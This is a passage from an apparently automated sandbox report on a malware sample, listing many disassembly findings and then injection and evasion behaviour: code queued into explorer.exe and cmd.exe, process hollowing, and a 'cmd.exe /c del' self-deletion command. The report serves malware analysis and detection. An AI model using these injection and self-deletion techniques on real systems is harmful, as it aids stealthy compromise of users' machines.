          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01760535 mov eax, dword ptr fs:[00000030h]2_2_01760535
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01760535 mov eax, dword ptr fs:[00000030h]2_2_01760535
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01760535 mov eax, dword ptr fs:[00000030h]2_2_01760535
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0177E53E mov eax, dword ptr fs:[00000030h]2_2_0177E53E
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0177E53E mov eax, dword ptr fs:[00000030h]2_2_0177E53E
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0177E53E mov eax, dword ptr fs:[00000030h]2_2_0177E53E
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0177E53E mov eax, dword ptr fs:[00000030h]2_2_0177E53E
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0177E53E mov eax, dword ptr fs:[00000030h]2_2_0177E53E
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017E6500 mov eax, dword ptr fs:[00000030h]2_2_017E6500
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01824500 mov eax, dword ptr fs:[00000030h]2_2_01824500
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01824500 mov eax, dword ptr fs:[00000030h]2_2_01824500
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01824500 mov eax, dword ptr fs:[00000030h]2_2_01824500
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01824500 mov eax, dword ptr fs:[00000030h]2_2_01824500
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01824500 mov eax, dword ptr fs:[00000030h]2_2_01824500
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01824500 mov eax, dword ptr fs:[00000030h]2_2_01824500
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01824500 mov eax, dword ptr fs:[00000030h]2_2_01824500
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0177E5E7 mov eax, dword ptr fs:[00000030h]2_2_0177E5E7
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0177E5E7 mov eax, dword ptr fs:[00000030h]2_2_0177E5E7
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0177E5E7 mov eax, dword ptr fs:[00000030h]2_2_0177E5E7
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0177E5E7 mov eax, dword ptr fs:[00000030h]2_2_0177E5E7
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0177E5E7 mov eax, dword ptr fs:[00000030h]2_2_0177E5E7
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0177E5E7 mov eax, dword ptr fs:[00000030h]2_2_0177E5E7
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0177E5E7 mov eax, dword ptr fs:[00000030h]2_2_0177E5E7
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0177E5E7 mov eax, dword ptr fs:[00000030h]2_2_0177E5E7
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017525E0 mov eax, dword ptr fs:[00000030h]2_2_017525E0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178C5ED mov eax, dword ptr fs:[00000030h]2_2_0178C5ED
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178C5ED mov eax, dword ptr fs:[00000030h]2_2_0178C5ED
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017565D0 mov eax, dword ptr fs:[00000030h]2_2_017565D0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178A5D0 mov eax, dword ptr fs:[00000030h]2_2_0178A5D0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178A5D0 mov eax, dword ptr fs:[00000030h]2_2_0178A5D0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178E5CF mov eax, dword ptr fs:[00000030h]2_2_0178E5CF
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178E5CF mov eax, dword ptr fs:[00000030h]2_2_0178E5CF
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017745B1 mov eax, dword ptr fs:[00000030h]2_2_017745B1
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017745B1 mov eax, dword ptr fs:[00000030h]2_2_017745B1
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D05A7 mov eax, dword ptr fs:[00000030h]2_2_017D05A7
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D05A7 mov eax, dword ptr fs:[00000030h]2_2_017D05A7
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D05A7 mov eax, dword ptr fs:[00000030h]2_2_017D05A7
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178E59C mov eax, dword ptr fs:[00000030h]2_2_0178E59C
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01784588 mov eax, dword ptr fs:[00000030h]2_2_01784588
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01752582 mov eax, dword ptr fs:[00000030h]2_2_01752582
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01752582 mov ecx, dword ptr fs:[00000030h]2_2_01752582
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0177A470 mov eax, dword ptr fs:[00000030h]2_2_0177A470
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0177A470 mov eax, dword ptr fs:[00000030h]2_2_0177A470
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0177A470 mov eax, dword ptr fs:[00000030h]2_2_0177A470
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0180A49A mov eax, dword ptr fs:[00000030h]2_2_0180A49A
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017DC460 mov ecx, dword ptr fs:[00000030h]2_2_017DC460
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0174645D mov eax, dword ptr fs:[00000030h]2_2_0174645D
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0177245A mov eax, dword ptr fs:[00000030h]2_2_0177245A
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178E443 mov eax, dword ptr fs:[00000030h]2_2_0178E443
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178E443 mov eax, dword ptr fs:[00000030h]2_2_0178E443
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178E443 mov eax, dword ptr fs:[00000030h]2_2_0178E443
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178E443 mov eax, dword ptr fs:[00000030h]2_2_0178E443
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_0178E443 mov eax, dword ptr fs:[00000030h] 2_2_0178E443
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_0174C427 mov eax, dword ptr fs:[00000030h] 2_2_0174C427
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_0174E420 mov eax, dword ptr fs:[00000030h] 2_2_0174E420
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_017D6420 mov eax, dword ptr fs:[00000030h] 2_2_017D6420
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_01788402 mov eax, dword ptr fs:[00000030h] 2_2_01788402
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_017504E5 mov ecx, dword ptr fs:[00000030h] 2_2_017504E5
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_017844B0 mov ecx, dword ptr fs:[00000030h] 2_2_017844B0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_017DA4B0 mov eax, dword ptr fs:[00000030h] 2_2_017DA4B0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_0180A456 mov eax, dword ptr fs:[00000030h] 2_2_0180A456
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_017564AB mov eax, dword ptr fs:[00000030h] 2_2_017564AB
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_01758770 mov eax, dword ptr fs:[00000030h] 2_2_01758770
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_01760770 mov eax, dword ptr fs:[00000030h] 2_2_01760770
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_017DE75D mov eax, dword ptr fs:[00000030h] 2_2_017DE75D
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_018047A0 mov eax, dword ptr fs:[00000030h] 2_2_018047A0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_01750750 mov eax, dword ptr fs:[00000030h] 2_2_01750750
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_017D4755 mov eax, dword ptr fs:[00000030h] 2_2_017D4755
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_01792750 mov eax, dword ptr fs:[00000030h] 2_2_01792750
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_0178674D mov esi, dword ptr fs:[00000030h] 2_2_0178674D
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_0178674D mov eax, dword ptr fs:[00000030h] 2_2_0178674D
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_0178273C mov eax, dword ptr fs:[00000030h] 2_2_0178273C
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_0178273C mov ecx, dword ptr fs:[00000030h] 2_2_0178273C
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_017CC730 mov eax, dword ptr fs:[00000030h] 2_2_017CC730
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_0178C720 mov eax, dword ptr fs:[00000030h] 2_2_0178C720
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_01750710 mov eax, dword ptr fs:[00000030h] 2_2_01750710
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_01780710 mov eax, dword ptr fs:[00000030h] 2_2_01780710
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_0178C700 mov eax, dword ptr fs:[00000030h] 2_2_0178C700
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_017547FB mov eax, dword ptr fs:[00000030h] 2_2_017547FB
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_017727ED mov eax, dword ptr fs:[00000030h] 2_2_017727ED
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_017DE7E1 mov eax, dword ptr fs:[00000030h] 2_2_017DE7E1
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_0175C7C0 mov eax, dword ptr fs:[00000030h] 2_2_0175C7C0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_017D07C3 mov eax, dword ptr fs:[00000030h] 2_2_017D07C3
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_017507AF mov eax, dword ptr fs:[00000030h] 2_2_017507AF
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_017F678E mov eax, dword ptr fs:[00000030h] 2_2_017F678E
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_01782674 mov eax, dword ptr fs:[00000030h] 2_2_01782674
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_0178A660 mov eax, dword ptr fs:[00000030h] 2_2_0178A660
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_0176C640 mov eax, dword ptr fs:[00000030h] 2_2_0176C640
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_0176E627 mov eax, dword ptr fs:[00000030h] 2_2_0176E627
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_01786620 mov eax, dword ptr fs:[00000030h] 2_2_01786620
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_01788620 mov eax, dword ptr fs:[00000030h] 2_2_01788620
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_0175262C mov eax, dword ptr fs:[00000030h] 2_2_0175262C
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_01792619 mov eax, dword ptr fs:[00000030h] 2_2_01792619
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_017CE609 mov eax, dword ptr fs:[00000030h] 2_2_017CE609
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_0176260B mov eax, dword ptr fs:[00000030h] 2_2_0176260B
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_017D06F1 mov eax, dword ptr fs:[00000030h] 2_2_017D06F1
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_017CE6F2 mov eax, dword ptr fs:[00000030h] 2_2_017CE6F2
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_0178A6C7 mov ebx, dword ptr fs:[00000030h] 2_2_0178A6C7
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_0178A6C7 mov eax, dword ptr fs:[00000030h] 2_2_0178A6C7
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_017866B0 mov eax, dword ptr fs:[00000030h] 2_2_017866B0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_0178C6A6 mov eax, dword ptr fs:[00000030h] 2_2_0178C6A6
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_01754690 mov eax, dword ptr fs:[00000030h] 2_2_01754690
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_0181866E mov eax, dword ptr fs:[00000030h] 2_2_0181866E
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_017DC97C mov eax, dword ptr fs:[00000030h] 2_2_017DC97C
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_017F4978 mov eax, dword ptr fs:[00000030h] 2_2_017F4978
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_01776962 mov eax, dword ptr fs:[00000030h] 2_2_01776962
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_0179096E mov eax, dword ptr fs:[00000030h] 2_2_0179096E
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_0179096E mov edx, dword ptr fs:[00000030h] 2_2_0179096E
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_017D0946 mov eax, dword ptr fs:[00000030h] 2_2_017D0946
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_0181A9D3 mov eax, dword ptr fs:[00000030h] 2_2_0181A9D3
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_017E892B mov eax, dword ptr fs:[00000030h] 2_2_017E892B
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_017D892A mov eax, dword ptr fs:[00000030h] 2_2_017D892A
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_01748918 mov eax, dword ptr fs:[00000030h] 2_2_01748918
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_017DC912 mov eax, dword ptr fs:[00000030h] 2_2_017DC912
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_017CE908 mov eax, dword ptr fs:[00000030h] 2_2_017CE908
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_017829F9 mov eax, dword ptr fs:[00000030h] 2_2_017829F9
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_017DE9E0 mov eax, dword ptr fs:[00000030h] 2_2_017DE9E0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_0175A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0175A9D0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_017849D0 mov eax, dword ptr fs:[00000030h] 2_2_017849D0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_017E69C0 mov eax, dword ptr fs:[00000030h] 2_2_017E69C0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_01824940 mov eax, dword ptr fs:[00000030h] 2_2_01824940
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_017D89B3 mov esi, dword ptr fs:[00000030h] 2_2_017D89B3
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_017D89B3 mov eax, dword ptr fs:[00000030h] 2_2_017D89B3
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_017629A0 mov eax, dword ptr fs:[00000030h] 2_2_017629A0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_017509AD mov eax, dword ptr fs:[00000030h] 2_2_017509AD
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_017E6870 mov eax, dword ptr fs:[00000030h] 2_2_017E6870
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_017DE872 mov eax, dword ptr fs:[00000030h] 2_2_017DE872
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_01754859 mov eax, dword ptr fs:[00000030h] 2_2_01754859
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_01780854 mov eax, dword ptr fs:[00000030h] 2_2_01780854
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_01762840 mov ecx, dword ptr fs:[00000030h] 2_2_01762840
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_01772835 mov eax, dword ptr fs:[00000030h] 2_2_01772835
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_01772835 mov ecx, dword ptr fs:[00000030h] 2_2_01772835
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_018208C0 mov eax, dword ptr fs:[00000030h] 2_2_018208C0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_017F483A mov eax, dword ptr fs:[00000030h] 2_2_017F483A
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_0178A830 mov eax, dword ptr fs:[00000030h] 2_2_0178A830
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_0181A8E4 mov eax, dword ptr fs:[00000030h] 2_2_0181A8E4
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_017DC810 mov eax, dword ptr fs:[00000030h] 2_2_017DC810
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_0178C8F9 mov eax, dword ptr fs:[00000030h] 2_2_0178C8F9
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_0177E8C0 mov eax, dword ptr fs:[00000030h] 2_2_0177E8C0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_017DC89D mov eax, dword ptr fs:[00000030h] 2_2_017DC89D
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_01750887 mov eax, dword ptr fs:[00000030h] 2_2_01750887
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_0174CB7E mov eax, dword ptr fs:[00000030h] 2_2_0174CB7E
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_01748B50 mov eax, dword ptr fs:[00000030h] 2_2_01748B50
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_017FEB50 mov eax, dword ptr fs:[00000030h] 2_2_017FEB50
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_01804BB0 mov eax, dword ptr fs:[00000030h] 2_2_01804BB0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_017F8B42 mov eax, dword ptr fs:[00000030h] 2_2_017F8B42
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_017E6B40 mov eax, dword ptr fs:[00000030h] 2_2_017E6B40
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_0177EB20 mov eax, dword ptr fs:[00000030h] 2_2_0177EB20
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_017CEB1D mov eax, dword ptr fs:[00000030h] 2_2_017CEB1D
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_01824B00 mov eax, dword ptr fs:[00000030h] 2_2_01824B00
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_01758BF0 mov eax, dword ptr fs:[00000030h] 2_2_01758BF0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_0177EBFC mov eax, dword ptr fs:[00000030h] 2_2_0177EBFC
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_017DCBF0 mov eax, dword ptr fs:[00000030h] 2_2_017DCBF0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_01818B28 mov eax, dword ptr fs:[00000030h] 2_2_01818B28
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_017FEBD0 mov eax, dword ptr fs:[00000030h] 2_2_017FEBD0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_01750BCD mov eax, dword ptr fs:[00000030h] 2_2_01750BCD
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_01770BCB mov eax, dword ptr fs:[00000030h] 2_2_01770BCB
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_0181AB40 mov eax, dword ptr fs:[00000030h] 2_2_0181AB40
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_01760BBE mov eax, dword ptr fs:[00000030h] 2_2_01760BBE
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_01804B4B mov eax, dword ptr fs:[00000030h] 2_2_01804B4B
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_01822B57 mov eax, dword ptr fs:[00000030h] 2_2_01822B57
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_01824A80 mov eax, dword ptr fs:[00000030h] 2_2_01824A80
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_017CCA72 mov eax, dword ptr fs:[00000030h] 2_2_017CCA72
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_0178CA6F mov eax, dword ptr fs:[00000030h] 2_2_0178CA6F
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_017FEA60 mov eax, dword ptr fs:[00000030h] 2_2_017FEA60
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_01756A50 mov eax, dword ptr fs:[00000030h] 2_2_01756A50
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_01760A5B mov eax, dword ptr fs:[00000030h] 2_2_01760A5B
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_01774A35 mov eax, dword ptr fs:[00000030h] 2_2_01774A35
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_0177EA2E mov eax, dword ptr fs:[00000030h] 2_2_0177EA2E
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_0178CA24 mov eax, dword ptr fs:[00000030h] 2_2_0178CA24
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_017DCA11 mov eax, dword ptr fs:[00000030h] 2_2_017DCA11
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_0178AAEE mov eax, dword ptr fs:[00000030h] 2_2_0178AAEE
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_01750AD0 mov eax, dword ptr fs:[00000030h] 2_2_01750AD0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_01784AD0 mov eax, dword ptr fs:[00000030h] 2_2_01784AD0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_017A6ACC mov eax, dword ptr fs:[00000030h] 2_2_017A6ACC
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_01758AA0 mov eax, dword ptr fs:[00000030h] 2_2_01758AA0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_017A6AA4 mov eax, dword ptr fs:[00000030h] 2_2_017A6AA4
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_01788A90 mov edx, dword ptr fs:[00000030h] 2_2_01788A90
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Code function: 2_2_0175EA80 mov eax, dword ptr fs:[00000030h] 2_2_0175EA80
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_00256800 GetProcessHeap,RtlFreeHeap, 4_2_00256800
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_00256EC0 SetUnhandledExceptionFilter, 4_2_00256EC0
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_00256B40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_00256B40
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Users\user\Desktop\n0srYVYMDI.exeNtQueueApcThread: Indirect: 0x160A4F2Jump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeNtClose: Indirect: 0x160A56C
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeMemory written: C:\Users\user\Desktop\n0srYVYMDI.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmd.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Thread register set: target process: 2580
          Source: C:\Windows\SysWOW64\cmd.exe Thread register set: target process: 2580
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Section unmapped: C:\Windows\SysWOW64\cmd.exe base address: 240000
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Process created: C:\Users\user\Desktop\n0srYVYMDI.exe "C:\Users\user\Desktop\n0srYVYMDI.exe"
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\n0srYVYMDI.exe"
          Source: explorer.exe, 00000003.00000003.3107210219.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1727896899.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4169460243.00000000018A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000002.4169460243.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1725693854.00000000018A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.1725122365.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4168908689.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 1Progman$
          Source: explorer.exe, 00000003.00000002.4169460243.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1725693854.00000000018A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
          Source: explorer.exe, 00000003.00000002.4169460243.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1725693854.00000000018A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
          Source: C:\Windows\SysWOW64\cmd.exe Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc,4_2_00246854
